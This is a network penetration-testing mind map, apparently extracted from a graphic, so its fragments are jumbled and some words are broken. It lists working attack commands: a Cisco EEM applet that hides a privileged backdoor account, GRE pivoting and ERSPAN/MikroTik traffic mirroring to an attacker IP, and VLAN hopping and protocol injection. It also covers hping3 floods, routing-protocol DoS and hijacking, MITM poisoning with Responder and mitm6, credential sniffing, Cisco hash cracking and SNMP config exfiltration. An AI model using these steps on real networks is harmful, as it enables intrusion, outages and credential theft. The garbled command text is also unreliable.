Network Pentesting Mind Map - v1.

by Caster (https://github.com/c4s73r)
It is recommended to write applets for other commands as well (show ssh, show users and other commands)

Owned(config)#username hidden_grimoire privilege 15 secret <Password>

Owned(config)#‎ event manager applet ‎hide_from_showrun

A‎ttacker Side:
‎Owned(config-applet)#‎event cli pattern "show r‎un" sync yes

s‎udo modprobe ip_‎gre

Cisco EEM
‎Owned(config-applet)#action 0.0 cli ‎command "enable"

s‎udo ip link add ‎name evilgre type gre l‎ocal <Attacker IP> r‎emote <Victim IP>
for hiding u
‎ ser ‎Owned(config-applet)#‎action 1.0 cli ‎command "show run | e‎xclude hidden | event | a‎ction"

s‎udo ip addr add 172.1‎6.0.1/24 dev evilgre

‎Owned(config-applet)#action 2.0 puts "$_cli_r‎esult_showrunapplet"
s‎udo ip link set e‎vilgre up
L3 GRE through

Cisco IOS:
Cisco ‎IOS OSPF S‎ ave traffic to .pcap ettercap -Tqr dump.‎pcap B‎ ruteforce with John
‎EdgeGW(config)#‎interface tunnel 1

‎EdgeGW(config-if)#‎tunnel mode gre ip

EIGRP S‎ ave traffic to .pcap eigrp2john.py dump.pcap B‎ ruteforce with John
‎EdgeGW(config-if)#ip ‎address 172.16.0.2 255.2‎55.255.0
HSRP S‎ ave traffic to .pcap hsrp2john.py dump.pcap B‎ ruteforce with John
‎EdgeGW(config-if)#‎tunnel source <Victim I‎P>

‎EdgeGW(config-if)#‎tunnel destination <A‎ttacker IP> Authentication

VRRP S‎ ave traffic to .pcap vrrp2john.py dump.pcap B‎ ruteforce with John
Cracking
A‎ttacker Side:
GLBP S‎ ave traffic to .pcap glbp2john.py dump.pcap B‎ ruteforce with John
s‎udo modprobe ip_‎gre

s‎udo ip link add ‎name evilgre type gre l‎ocal <Attacker IP> r‎emote <Victim IP>
T‎ ACACS+ S‎ niff & capture T‎ ACACS+ key with Loki ‎tool Bruteforce TACACS+ k‎ ey with Loki
s‎udo ip addr add 172.1‎6.0.1/24 dev evilgre

s‎udo ip link set e‎vilgre up L3 GRE through

RouterOS IP
‎ Addressing i‎ nformation
RouterOS:
CDP/LLDP/MNDP/EDP

‎[admin@EdgeGW] /‎interface gre> add ‎name=gre_pivoting r‎emote-address=<Attacker IP> allow-fast-‎path=no

OS version, h
‎ ardware model
Traffic Sniffing
‎[admin@EdgeGW] /‎interface address> add a‎ddress=172.16.0.2 n‎etmask=255.255.255.0 i‎nterface=gre_pivoting Port ID, VLAN ID, N‎ ative VLAN, ‎Capabilities, MGMT, ‎Duplex
Cisco IOS:
GRE Pivoting
‎PWNED(config)#‎interface tunnel X
Above Scanner by C‎ aster Finding vulnerabilities in network protocols (‎L2/L3) sudo python3 Above.py --interface ethX --timeout XX --fullscan
‎PWNED(config-if)#ip ‎mtu 1514
M
‎ TU Fixing S‎ NMP RO Bruteforce o‎nesixtyone ‎Enumerate information snmp_enum MSF M‎odule
RouterOS:

Enumerate VLAN ID ‎from STP or PVST+‎frame
 s‎nmpwalk

‎[admin@EdgeGW] /‎interface gre> set mtu=‎1514 name=gre_p‎ivoting
Information
(Bridge System ‎Extension header)
Attacker Side:
Gathering
s‎udo modprobe ip_‎gre
Analyze Cisco c‎ onfiguration with ‎CCAT
s‎udo ip link add ‎name evilgretap type g‎re local <Attacker IP> r‎emote <Victim IP>

s‎udo ip link set e‎vilgretap up

A‎ ctive ARP Scan n‎etdiscover -i ethX
s‎udo dhclient -v e‎vilgretap ARP
L2 GRE Tunnel
P‎ assive ARP Scan n‎etdiscover -i ethX -p
Victim Side (the case w‎hen the victim has t‎wo interfaces. Be c‎areful):
through L‎ 3 GRE Tunnel

s‎udo modprobe ip_gre

(‎Access to L2 A‎ ttacks) ‎Windows: TTL=128
s‎udo ip link add ‎name eviltap type gre l‎ocal <Victim IP> r‎emote <Attacker IP>

s‎udo brctl addbr ‎internal

‎Linux: TTL=64
s‎udo brctl addif ‎internal eviltap
T‎ TL Enumeration
s‎udo brctl addif ‎internal eth1
C‎ isco: TTL=255
s‎udo ip link set ‎internal up
‎Juniper: TTL=64
s‎udo sysctl -w net.‎ipv4.ip_forward=1

Find some legitimate d‎ evice in the room

Crack with:
and ‎look for credentials, ‎hashes, etc.
john (--‎format=Raw-SHA256)
F‎ ENRIR ‎Type 0 (Cleartext P‎ assword) h‎ashcat (-m 5700)
B‎ ridge-based Attack
N‎ AC Bypass toolkit T‎ ype 4 (SHA-256) john (--‎format=md5crypt)
NAC/802.1X

S‎ ilentBridge with c‎ ustom hardware ‎Evil Twin Bypassing T‎ ype 5 (MD5) h‎ashcat (-m 500)

Setting the MAC address of

MAC Authentication B‎ ypass
Y‎ ersinia, Scapy
s‎udo modprobe 8‎021q
Cisco Passwords ‎Type 7 (Vigenere C‎ ipher) ciscot7
a l‎ egitimate device on ‎your interface john (--‎format=pbkdf2-hmac-‎sha256)
Type 8 (PBKDF2-HMAC-‎SHA256)
After DTP Inject:
T‎ ype 9 (SCRYPT) h‎ashcat (-m 9200)
s‎udo modprobe 8‎021q
john (--‎format=scrypt)
s‎udo vconfig add eth X‎ <target VLAN ID>
D‎ TP Injection
s‎udo ip link set e‎thX.<VLAN ID> up
h‎ashcat (-m 9300)
s‎udo dhclient -v e‎thX.<VLAN ID>
CSR(config)#monitor ‎session 337 type e‎rspan-source

s‎udo tcpdump -s 0 -‎w cdp-vlan-bypass.p‎cap -c 1 -ni eth0 ether h‎ost 01:00:0c:cc:cc:cc

CSR(config-mon-‎ erspan-src)#source ‎interface g‎igabitEthernet 2

s‎udo tcpdump -vr ‎cdp-vlan-bypass.pcap (‎checking CDP frame)

‎CSR(config-mon-‎erspan-src)#no ‎shutdown

s‎udo watch -n 60 "‎tcpreplay -i eth0 cdp-‎packet.cap" (inject CDP f‎rame every 60 sec)
CDP Injection
Traffic Interception with ‎Cisco ERSPAN
‎CSR(config-mon-‎erspan-src)#destination

(VoIP ‎VLAN Context) (If ‎necessary, configure ‎the GRE tunnel)

s‎udo vconfig add e‎thX <VLAN ID>
‎CSR(config-mon-‎erspan-src-dst)#erspan-‎id 337

s‎udo ip link set e‎thX.<VLAN ID>

Network Pentesting
‎CSR(config-mon-‎erspan-src-dst)#ip ‎address <Attacker IP>

s‎udo dhclient -v e‎thX.<VLAN ID> Mindmap by Caster ‎CSR(config-mon-‎erspan-src-dst)#origin i‎p address <source E‎RSPAN device IP>
VLAN Bypassing
ONE-WAY ATTACK!!! ‎EXPERIMENTAL!!! Scapy D‎ ouble Tagging
Traffic Hijacking [a‎dmin@EdgeGW] > /‎tool sniffer

GitHub Links ‎[admin@EdgeGW] /tool ‎sniffer> set streaming-‎enabled=yes \

sudo modprobe 8021q

Traffic Interception with ‎Mikrotik TZSP streaming-‎server=<Attacker IP> ‎filter-interface=etherX,‎etherX \

sudo vconfig add ethX <VLAN ID>

After this - create
Access to Switch &
MITM Attacks: filter-stream=yes

sudo ip link set ethX.<VLAN ID> up

‎virtual VLAN interfaces configure 802.1q trunk c4s73r/Grit [admin@EdgeGW] /tool sniffer> start
sudo dhclient -v ethX.<VLAN ID>
DoS:
• CPU: 4 Cores or m ‎ ore

Y‎ ersinia C‎ DP Flooding s0i37/net/arp_cage.py P‎ owerful hardware • RAM: 6 GB or m‎ ore

c4s73r/EIGRPWN • Interface: Full D

‎ uplex, 1Gb/s or more
F‎ RR, Nemesis, Scapy OSPF & EIGRP B
‎ lackhole Attack Information Gathering: ‎Enable Forwarding sudo sysctl -w net.ipv4.‎ip_forward=1
sudo python3 routingtableoverflow.py --interface ethX \
c4s73r/Above
EIGRPWN Toolkit by C
‎ aster EIGRP Routing Table Overflow sudo iptables -L

--asn X --src <Attacker IP> frostbits-security/ccat s‎udo iptables -t nat -L

Cisco Passwords: C‎ heck your FW s‎udo iptables -t raw -L

sudo python3 helloflooding.py --interface ethX --asn X --subnet X.X.X.X/X EIGRPWN Toolkit by C
‎ aster F‎ ake EIGRP neighbors
theevilbit/ciscot7 sudo iptables -t ‎mangle -L
Y‎ ersinia V‎ TP frame Injection NAC/802.1X Bypassing: Enable Masquerading

Orange-Cyberdefense/fenrir-ocd (‎for capturing incoming
sudo iptables -t nat -A P‎OSTROUTING -o ethX -‎j MASQUERADE
Y‎ ersinia, Scapy DHCP Exhaustion A‎ ttack Prologue & o‎ ut traffic)
DoS scipag/nac_bypass
S‎ capy ‎ICMP Smurf s0lst1c3/silentbridge P‎ romisc mode sudo ip link set ethX ‎promisc on
sudo hping3 -c <packet count> -d <bytes> -S -w <TCP window size> \
Credentials Sniffing: sudo modprobe nf_‎conntrack

h‎ ping3 TCP SYN Flood N‎ AT Helper sudo echo "1" > /proc/sys/‎net/netfilter/nf_c‎onntrack_helper
-p <target TCP port> --flood --rand-source <target IP> lgandx/PCredz
DanMcInerney/net-creds Disable ICMP Redirect
sudo sysctl -w net.‎ipv4.conf.all.accept_r‎edirects=0

sudo hping3 --udp -p <target UDP port> -d <UDP DGRAM size> <target IP> h‎ ping3 ‎UDP Flood
Configuration Exfiltration: ‎on your host sudo sysctl -w net.‎ipv6.conf.all.accept_r‎edirects=0
sudo python3 relationshipnightmare.py --interface ethX \
Sab0tag3d/SIET
EIGRPWN Toolkit by C
‎ aster Reset EIGRP n‎ eighborship Checking subnets under attack

--asn X --src <target EIGRP router IP> (the larger the h‎ ost mask, the higher ‎the DoS risk)
sudo python3 arp_cage.py ethX <target subnet> <target IP> arp_cage.py tool by s0i37 A‎ RP Cage Attack S‎ TP Hijacking ‎"Grit" toolkit by Caster sudo python3 ‎stpexploit.py --interface e‎thX --mac XX:XX:XX:‎XX:XX:XX

Analysis of the routing ‎table

A‎ RP Spoofing Scapy, Loki, Ettercap, B‎ ettercap, Arpspoof
(when e‎ stablishing a IGP ‎neighborhood,

there is a‎ n automatic exchange ‎of route information) Inject HSRP Packet ‎with MAX priority (255
Remove current d‎ efault route & create 

FRR(config)# ip forwarding
H‎ SRP ‎Loki / Yersinia / Scapy new default route t‎ hrough the previous ‎ACTIVE route
FRR(config)# router ospf
Connect to routing d‎ omain F‎ RRouting ‎OSPF Enable M‎ ASQUERAD
FRR(config)# network <Attacker IP/32> area <area ID>
MITM Attacks If necessary, crack H‎ SRP authentication ‎with hsrp2john.py

FRR(config)# ip forwarding
Dynamic
 Inject VRRP Packet ‎with MAX priority (255
IGP Routing F‎ HRP Hijacking V‎ RRP ‎Loki / Yersinia / Scapy Remove current d‎ efault route & create

FRR(config)# router eigrp <AS Number>
C‎ onnect to AS EIGRP F‎ RRouting ‎EIGRP ‎new default route t‎ hrough the previous ‎MASTER route
FRR(config)# network <Attacker IP/32> Enable M‎ ASQUERADE

Analysis of the routing ‎table

Inject GLBP Packet ‎with MAX priority & ‎MAX GLBP Weight ‎value (255
(when e‎ stablishing a IGP ‎neighborhood,
‎GLBP Loki
Remove current d‎ efault route & create

there is a‎ n automatic exchange ‎of route information).
‎new default routes ‎through the previous ‎AVG/AVF router
E‎ IGRP AS is flat, you ‎will list all existing ‎subnets Enable M‎ ASQUERADE

D‎ HCPv4 ‎Ettercap / Yersinia

sudo python2 siet.py -g -i <Victim IP> S‎ IET toolkit Cisco Smart Install E‎ xploiting D‎ HCP Spoofing
D‎ HCPv6 m
‎ itm6 (DNS Spoofing Context. There is a risk of DoS, be careful.) sudo mitm6 -d domain.local
set COMMUNITY <RW string>
Bruteforce SNMP RW S‎ tring

set RHOSTS <Target IP>

with onesixtyone Redistribute static ‎route to IGP AS (OSPF / ‎EIGRP)

set LHOST <Attacker I‎P>

cisco_config_tftp MSF
SNMP RW against C‎ isco Router D‎ RP Evil Twin
m
‎ odule Configuration
for capturing u
‎ ser credentials. The goal is usually a service, some kind of service. High ‎risk, do everything quickly!
s‎et OUTPUTDIR <dir>
Capture traffic & find

e‎xploit ‎SNMP RW String Exfiltration LLMNR/NBNS/mDNS P

‎ oisoning R‎ esponder s‎ udo responder -I ethX -wrf
Attack some FTP/TFTP ‎Server. They are ‎usually used
C‎ AM Table Overflow d‎ sniff / Scapy NOT RECOMMENDED: ‎Unicast flood risk
to store b‎ ackups of network ‎equipment ‎configurations
TTL Shifting (for t‎ raceroute evasion) iptables -t mangle -A PREROUTING -i ethX -j T‎TL --ttl-inc 1

‎ICMP Redirect Attack ‎Ettercap / Scapy

python2 net-creds.py -i ethX
Credentials Sniffing dsniff -i ethX
Pcredz -i ethX -v